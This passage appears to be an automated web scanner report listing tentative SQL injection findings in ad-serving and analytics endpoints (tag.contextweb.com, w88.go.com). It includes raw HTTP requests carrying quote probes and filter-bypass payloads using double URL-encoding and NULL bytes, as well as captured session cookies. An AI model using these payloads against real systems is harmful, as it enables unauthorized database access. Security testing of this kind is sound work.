P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:46 GMT
Content-Length: 2041
Connection: close
Set-Cookie: vf=802; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app207_N4UEGwHAZheP%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=%00''&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP211
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:47 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224067319; Domain=.contextweb.com; Path=/
Set-Cookie: vf=803; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.27. http://tag.contextweb.com/TagPublish/GetAd.aspx [esid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The esid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the esid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid='&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP208
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2041
Date: Sat, 17 Sep 2011 01:47:50 GMT
Connection: close
Set-Cookie: vf=806; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_728x90.jpg%20height%3D90%20border%3D0%20width%3D728%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app208_1c4prRRFRDCJ%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=''&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:51 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224071201; Domain=.contextweb.com; Path=/
Set-Cookie: vf=807; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The pb_rtb_ev cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pb_rtb_ev cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pb_rtb_ev cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:19:16 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=592; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app203_AjrHJFvs9xWj%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2372
Date: Sat, 17 Sep 2011 01:19:17 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222357255; Domain=.contextweb.com; Path=/
Set-Cookie: vf=593; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The pxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pxy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:39 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=529; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_3NkTLnCH1peq%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:39 GMT
Content-Length: 1846
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222319958; Domain=.contextweb.com; Path=/
Set-Cookie: vf=530; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgabccom,wdgasec%00'/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgabccom,wdgasec was not found on this server.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgabccom,wdgasec%00''/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B

Response 2
